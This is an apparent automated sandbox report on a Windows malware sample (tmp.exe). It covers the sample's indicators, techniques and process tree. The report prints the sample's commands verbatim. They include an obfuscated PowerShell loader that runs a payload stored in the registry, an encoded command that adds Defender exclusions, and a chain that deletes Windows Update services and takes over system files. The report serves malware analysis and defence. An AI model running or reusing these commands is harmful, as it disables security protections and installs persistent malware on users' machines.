aa0a1f379ba188db1bec2c91b483e9b628ddc319da17876cc0bab9d75b756cd2

Analysis

max time kernel
151s
max time network
52s
platform
windows7_x64
resource
win7-20221111-en
resource tags

arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system
submitted
17-01-2023 20:24

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

tmp.exe
Size

4.9MB
MD5

619c8566b61a49d28d25590a16611849
SHA1

d6c75e985d9ae6ff79b29bf39cac1d7514e7a473
SHA256

aa0a1f379ba188db1bec2c91b483e9b628ddc319da17876cc0bab9d75b756cd2
SHA512

a367b2188076923c050879685196dcbbe036dd317e0c976a45999008938fe15621ed69691e9817965df0957abe1a00017ddbe6fa0b0d83a6c5b66ca08de63363
SSDEEP

98304:ZlsCMnpZW6zAEqWn4mb8AarnNGEsOOFUySajl69XE:bsdnm68Ev44/2nk8OF1xjl69

Score

10^/10

discovery evasion exploit vmprotect

Malware Config

Signatures

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security	reg.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

powershell.EXE

description pid process target process

PID 2000 created 416 2000 powershell.EXE winlogon.exe

description	pid	process	target process
PID 2000 created 416	2000	powershell.EXE	winlogon.exe

Drops file in Drivers directory 2 IoCs

Processes:

tmp.exeMicrosoftEdgeUpdate.exe

description	ioc	process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	tmp.exe
File opened for modification	C:\Windows\system32\drivers\etc\hosts	MicrosoftEdgeUpdate.exe

Executes dropped EXE 1 IoCs

Processes:

MicrosoftEdgeUpdate.exe

pid process

1176 MicrosoftEdgeUpdate.exe
Possible privilege escalation attempt 4 IoCs
exploit

Processes:

takeown.exeicacls.exetakeown.exeicacls.exe

pid process

1776 takeown.exe
956 icacls.exe
1008 takeown.exe
1748 icacls.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

pid	process
1176	MicrosoftEdgeUpdate.exe

pid	process
1776	takeown.exe
956	icacls.exe
1008	takeown.exe
1748	icacls.exe

VMProtect packed file 5 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

Processes:

resource	yara_rule
behavioral1/memory/1352-54-0x0000000001030000-0x00000000019B4000-memory.dmp	vmprotect
\Program Files\Microsoft\EdgeUpdater\MicrosoftEdgeUpdate.exe	vmprotect
C:\Program Files\Microsoft\EdgeUpdater\MicrosoftEdgeUpdate.exe	vmprotect
C:\Program Files\Microsoft\EdgeUpdater\MicrosoftEdgeUpdate.exe	vmprotect
behavioral1/memory/1176-129-0x0000000000340000-0x0000000000CC4000-memory.dmp	vmprotect

Deletes itself 1 IoCs

Processes:

cmd.exe

pid process

1680 cmd.exe
Loads dropped DLL 1 IoCs

Processes:

taskeng.exe

pid process

1532 taskeng.exe
Modifies file permissions 1 TTPs 4 IoCs
discovery

File Permissions Modification
T1222

Processes:

takeown.exeicacls.exetakeown.exeicacls.exe

pid process

1008 takeown.exe
1748 icacls.exe
1776 takeown.exe
956 icacls.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

4 ip-api.com

pid	process
1680	cmd.exe

pid	process
1532	taskeng.exe

pid	process
1008	takeown.exe
1748	icacls.exe
1776	takeown.exe
956	icacls.exe

flow	ioc
4	ip-api.com

Drops file in System32 directory 3 IoCs

Processes:

powershell.exepowershell.EXEpowershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

tmp.exepowershell.EXE

description	pid	process	target process
PID 1352 set thread context of 572	1352	tmp.exe	conhost.exe
PID 2000 set thread context of 1076	2000	powershell.EXE	dllhost.exe

Drops file in Program Files directory 3 IoCs

Processes:

tmp.exeMicrosoftEdgeUpdate.exe

description	ioc	process
File created	C:\Program Files\Microsoft\EdgeUpdater\MicrosoftEdgeUpdate.exe	tmp.exe
File opened for modification	C:\Program Files\Microsoft\EdgeUpdater\MicrosoftEdgeUpdate.exe	tmp.exe
File created	C:\Program Files\Google\Libs\WR64.sys	MicrosoftEdgeUpdate.exe

Drops file in Windows directory 6 IoCs

Processes:

conhost.exesvchost.exe

description	ioc	process
File created	C:\Windows\Tasks\dialersvc32.job	conhost.exe
File opened for modification	C:\Windows\Tasks\dialersvc32.job	conhost.exe
File created	C:\Windows\Tasks\dialersvc64.job	conhost.exe
File opened for modification	C:\Windows\Tasks\dialersvc64.job	conhost.exe
File opened for modification	C:\Windows\appcompat\programs\RecentFileCache.bcf	svchost.exe
File opened for modification	C:\Windows\Tasks\dialersvc32.job	svchost.exe

Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

856 sc.exe
832 sc.exe
852 sc.exe
624 sc.exe
744 sc.exe
108 sc.exe
1444 sc.exe
2016 sc.exe
316 sc.exe
736 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

1344 schtasks.exe

pid	process
856	sc.exe
832	sc.exe
852	sc.exe
624	sc.exe
744	sc.exe
108	sc.exe
1444	sc.exe
2016	sc.exe
316	sc.exe
736	sc.exe

pid	process
1344	schtasks.exe

Modifies data under HKEY_USERS 5 IoCs

Processes:

powershell.EXEMicrosoftEdgeUpdate.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.EXE
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 30d6a642ba2ad901	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	MicrosoftEdgeUpdate.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	MicrosoftEdgeUpdate.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	MicrosoftEdgeUpdate.exe

Modifies registry key 1 TTPs 17 IoCs

Modify Registry

T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

pid	process
1680	reg.exe
1712	reg.exe
1516	reg.exe
1544	reg.exe
2016	reg.exe
900	reg.exe
316	reg.exe
1496	reg.exe
1608	reg.exe
2000	reg.exe
2000	reg.exe
1676	reg.exe
580	reg.exe
1184	reg.exe
1412	reg.exe
1984	reg.exe
1360	reg.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

tmp.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde	tmp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436	tmp.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exetmp.exepowershell.EXEdllhost.exedllhost.exepowershell.exe

pid	process
1244	powershell.exe
1352	tmp.exe
2000	powershell.EXE
2000	powershell.EXE
1076	dllhost.exe
1076	dllhost.exe
1076	dllhost.exe
1076	dllhost.exe
1076	dllhost.exe
1076	dllhost.exe
1076	dllhost.exe
1076	dllhost.exe
852	dllhost.exe
852	dllhost.exe
852	dllhost.exe
852	dllhost.exe
1076	dllhost.exe
1076	dllhost.exe
852	dllhost.exe
852	dllhost.exe
1076	dllhost.exe
1076	dllhost.exe
1076	dllhost.exe
1076	dllhost.exe
852	dllhost.exe
852	dllhost.exe
1076	dllhost.exe
1076	dllhost.exe
852	dllhost.exe
852	dllhost.exe
1076	dllhost.exe
1076	dllhost.exe
852	dllhost.exe
852	dllhost.exe
1076	dllhost.exe
1076	dllhost.exe
852	dllhost.exe
852	dllhost.exe
852	dllhost.exe
852	dllhost.exe
1076	dllhost.exe
1076	dllhost.exe
852	dllhost.exe
852	dllhost.exe
1224	powershell.exe
1076	dllhost.exe
1076	dllhost.exe
852	dllhost.exe
852	dllhost.exe
1076	dllhost.exe
1076	dllhost.exe
852	dllhost.exe
852	dllhost.exe
1076	dllhost.exe
1076	dllhost.exe
852	dllhost.exe
852	dllhost.exe
1076	dllhost.exe
1076	dllhost.exe
852	dllhost.exe
852	dllhost.exe
1076	dllhost.exe
1076	dllhost.exe
852	dllhost.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Explorer.EXE

pid process

1284 Explorer.EXE

pid	process
1284	Explorer.EXE

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exetmp.exetakeown.exepowershell.EXEdllhost.exedllhost.exesvchost.exepowershell.exepowercfg.exeMicrosoftEdgeUpdate.exepowercfg.exe

description	pid	process
Token: SeDebugPrivilege	1244	powershell.exe
Token: SeShutdownPrivilege	920	powercfg.exe
Token: SeShutdownPrivilege	1644	powercfg.exe
Token: SeShutdownPrivilege	1640	powercfg.exe
Token: SeShutdownPrivilege	2004	powercfg.exe
Token: SeDebugPrivilege	1352	tmp.exe
Token: SeTakeOwnershipPrivilege	1008	takeown.exe
Token: SeDebugPrivilege	2000	powershell.EXE
Token: SeDebugPrivilege	2000	powershell.EXE
Token: SeDebugPrivilege	1076	dllhost.exe
Token: SeDebugPrivilege	852	dllhost.exe
Token: SeAuditPrivilege	868	svchost.exe
Token: SeDebugPrivilege	1224	powershell.exe
Token: SeShutdownPrivilege	544	powercfg.exe
Token: SeDebugPrivilege	1176	MicrosoftEdgeUpdate.exe
Token: SeShutdownPrivilege	944	powercfg.exe
Token: SeAssignPrimaryTokenPrivilege	868	svchost.exe
Token: SeIncreaseQuotaPrivilege	868	svchost.exe
Token: SeSecurityPrivilege	868	svchost.exe
Token: SeTakeOwnershipPrivilege	868	svchost.exe
Token: SeLoadDriverPrivilege	868	svchost.exe
Token: SeSystemtimePrivilege	868	svchost.exe
Token: SeBackupPrivilege	868	svchost.exe
Token: SeRestorePrivilege	868	svchost.exe
Token: SeShutdownPrivilege	868	svchost.exe
Token: SeSystemEnvironmentPrivilege	868	svchost.exe
Token: SeUndockPrivilege	868	svchost.exe
Token: SeManageVolumePrivilege	868	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	868	svchost.exe
Token: SeIncreaseQuotaPrivilege	868	svchost.exe
Token: SeSecurityPrivilege	868	svchost.exe
Token: SeTakeOwnershipPrivilege	868	svchost.exe
Token: SeLoadDriverPrivilege	868	svchost.exe
Token: SeSystemtimePrivilege	868	svchost.exe
Token: SeBackupPrivilege	868	svchost.exe
Token: SeRestorePrivilege	868	svchost.exe
Token: SeShutdownPrivilege	868	svchost.exe
Token: SeSystemEnvironmentPrivilege	868	svchost.exe
Token: SeUndockPrivilege	868	svchost.exe
Token: SeManageVolumePrivilege	868	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	868	svchost.exe
Token: SeIncreaseQuotaPrivilege	868	svchost.exe
Token: SeSecurityPrivilege	868	svchost.exe
Token: SeTakeOwnershipPrivilege	868	svchost.exe
Token: SeLoadDriverPrivilege	868	svchost.exe
Token: SeSystemtimePrivilege	868	svchost.exe
Token: SeBackupPrivilege	868	svchost.exe
Token: SeRestorePrivilege	868	svchost.exe
Token: SeShutdownPrivilege	868	svchost.exe
Token: SeSystemEnvironmentPrivilege	868	svchost.exe
Token: SeUndockPrivilege	868	svchost.exe
Token: SeManageVolumePrivilege	868	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	868	svchost.exe
Token: SeIncreaseQuotaPrivilege	868	svchost.exe
Token: SeSecurityPrivilege	868	svchost.exe
Token: SeTakeOwnershipPrivilege	868	svchost.exe
Token: SeLoadDriverPrivilege	868	svchost.exe
Token: SeSystemtimePrivilege	868	svchost.exe
Token: SeBackupPrivilege	868	svchost.exe
Token: SeRestorePrivilege	868	svchost.exe
Token: SeShutdownPrivilege	868	svchost.exe
Token: SeSystemEnvironmentPrivilege	868	svchost.exe
Token: SeUndockPrivilege	868	svchost.exe
Token: SeManageVolumePrivilege	868	svchost.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

tmp.execmd.execmd.exe

description	pid	process	target process
PID 1352 wrote to memory of 1244	1352	tmp.exe	powershell.exe
PID 1352 wrote to memory of 1244	1352	tmp.exe	powershell.exe
PID 1352 wrote to memory of 1244	1352	tmp.exe	powershell.exe
PID 1352 wrote to memory of 1492	1352	tmp.exe	cmd.exe
PID 1352 wrote to memory of 1492	1352	tmp.exe	cmd.exe
PID 1352 wrote to memory of 1492	1352	tmp.exe	cmd.exe
PID 1352 wrote to memory of 1020	1352	tmp.exe	cmd.exe
PID 1352 wrote to memory of 1020	1352	tmp.exe	cmd.exe
PID 1352 wrote to memory of 1020	1352	tmp.exe	cmd.exe
PID 1492 wrote to memory of 856	1492	cmd.exe	sc.exe
PID 1492 wrote to memory of 856	1492	cmd.exe	sc.exe
PID 1492 wrote to memory of 856	1492	cmd.exe	sc.exe
PID 1020 wrote to memory of 920	1020	cmd.exe	powercfg.exe
PID 1020 wrote to memory of 920	1020	cmd.exe	powercfg.exe
PID 1020 wrote to memory of 920	1020	cmd.exe	powercfg.exe
PID 1492 wrote to memory of 832	1492	cmd.exe	sc.exe
PID 1492 wrote to memory of 832	1492	cmd.exe	sc.exe
PID 1492 wrote to memory of 832	1492	cmd.exe	sc.exe
PID 1020 wrote to memory of 1644	1020	cmd.exe	powercfg.exe
PID 1020 wrote to memory of 1644	1020	cmd.exe	powercfg.exe
PID 1020 wrote to memory of 1644	1020	cmd.exe	powercfg.exe
PID 1492 wrote to memory of 1444	1492	cmd.exe	sc.exe
PID 1492 wrote to memory of 1444	1492	cmd.exe	sc.exe
PID 1492 wrote to memory of 1444	1492	cmd.exe	sc.exe
PID 1492 wrote to memory of 852	1492	cmd.exe	sc.exe
PID 1492 wrote to memory of 852	1492	cmd.exe	sc.exe
PID 1492 wrote to memory of 852	1492	cmd.exe	sc.exe
PID 1020 wrote to memory of 1640	1020	cmd.exe	powercfg.exe
PID 1020 wrote to memory of 1640	1020	cmd.exe	powercfg.exe
PID 1020 wrote to memory of 1640	1020	cmd.exe	powercfg.exe
PID 1492 wrote to memory of 624	1492	cmd.exe	sc.exe
PID 1492 wrote to memory of 624	1492	cmd.exe	sc.exe
PID 1492 wrote to memory of 624	1492	cmd.exe	sc.exe
PID 1492 wrote to memory of 1184	1492	cmd.exe	reg.exe
PID 1492 wrote to memory of 1184	1492	cmd.exe	reg.exe
PID 1492 wrote to memory of 1184	1492	cmd.exe	reg.exe
PID 1020 wrote to memory of 2004	1020	cmd.exe	powercfg.exe
PID 1020 wrote to memory of 2004	1020	cmd.exe	powercfg.exe
PID 1020 wrote to memory of 2004	1020	cmd.exe	powercfg.exe
PID 1492 wrote to memory of 1680	1492	cmd.exe	reg.exe
PID 1492 wrote to memory of 1680	1492	cmd.exe	reg.exe
PID 1492 wrote to memory of 1680	1492	cmd.exe	reg.exe
PID 1492 wrote to memory of 1712	1492	cmd.exe	reg.exe
PID 1492 wrote to memory of 1712	1492	cmd.exe	reg.exe
PID 1492 wrote to memory of 1712	1492	cmd.exe	reg.exe
PID 1492 wrote to memory of 1412	1492	cmd.exe	reg.exe
PID 1492 wrote to memory of 1412	1492	cmd.exe	reg.exe
PID 1492 wrote to memory of 1412	1492	cmd.exe	reg.exe
PID 1492 wrote to memory of 1984	1492	cmd.exe	reg.exe
PID 1492 wrote to memory of 1984	1492	cmd.exe	reg.exe
PID 1492 wrote to memory of 1984	1492	cmd.exe	reg.exe
PID 1492 wrote to memory of 1008	1492	cmd.exe	takeown.exe
PID 1492 wrote to memory of 1008	1492	cmd.exe	takeown.exe
PID 1492 wrote to memory of 1008	1492	cmd.exe	takeown.exe
PID 1492 wrote to memory of 1748	1492	cmd.exe	icacls.exe
PID 1492 wrote to memory of 1748	1492	cmd.exe	icacls.exe
PID 1492 wrote to memory of 1748	1492	cmd.exe	icacls.exe
PID 1492 wrote to memory of 1608	1492	cmd.exe	reg.exe
PID 1492 wrote to memory of 1608	1492	cmd.exe	reg.exe
PID 1492 wrote to memory of 1608	1492	cmd.exe	reg.exe
PID 1492 wrote to memory of 1516	1492	cmd.exe	reg.exe
PID 1492 wrote to memory of 1516	1492	cmd.exe	reg.exe
PID 1492 wrote to memory of 1516	1492	cmd.exe	reg.exe
PID 1492 wrote to memory of 1544	1492	cmd.exe	reg.exe

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:476

C:\Windows\system32\services.exe
C:\Windows\system32\services.exe
1⤵
PID:460

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
2⤵
PID:796

C:\Windows\system32\Dwm.exe
"C:\Windows\system32\Dwm.exe"
3⤵
PID:1192

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
2⤵
PID:1060

C:\Windows\system32\sppsvc.exe
C:\Windows\system32\sppsvc.exe
2⤵
PID:1632

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
2⤵
PID:1088

C:\Windows\system32\taskhost.exe
"taskhost.exe"
2⤵
PID:1120

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
2⤵
PID:604

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService
2⤵
PID:272

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs
2⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:868

C:\Windows\system32\taskeng.exe
taskeng.exe {2D4C2EB5-73A1-4D2D-B9BA-1ACD2C11BC28} S-1-5-18:NT AUTHORITY\System:Service:
3⤵
- Loads dropped DLL
PID:1532

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2000

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
4⤵
PID:1080

C:\Program Files\Microsoft\EdgeUpdater\MicrosoftEdgeUpdate.exe
"C:\Program Files\Microsoft\EdgeUpdater\MicrosoftEdgeUpdate.exe"
4⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1176

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AcAB3AHkAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBmAHQAbQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBvAHYAYwBtACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAdgBsAHUAIwA+AA=="
5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1224

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
5⤵
PID:1208

C:\Windows\system32\sc.exe
sc stop UsoSvc
6⤵
- Launches sc.exe
PID:2016

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
6⤵
- Launches sc.exe
PID:316

C:\Windows\system32\sc.exe
sc stop wuauserv
6⤵
- Launches sc.exe
PID:744

C:\Windows\system32\sc.exe
sc stop bits
6⤵
- Launches sc.exe
PID:736

C:\Windows\system32\sc.exe
sc stop dosvc
6⤵
- Launches sc.exe
PID:108

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
6⤵
- Modifies registry key
PID:900

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
6⤵
- Modifies registry key
PID:1360

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
6⤵
- Modifies registry key
PID:1496

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
6⤵
- Modifies registry key
PID:2000

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
6⤵
- Modifies registry key
PID:316

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
6⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1776

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
6⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:956

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
6⤵
- Modifies registry key
PID:2000

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
6⤵
- Modifies registry key
PID:1676

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
6⤵
- Modifies registry key
PID:580

C:\Windows\System32\cmd.exe
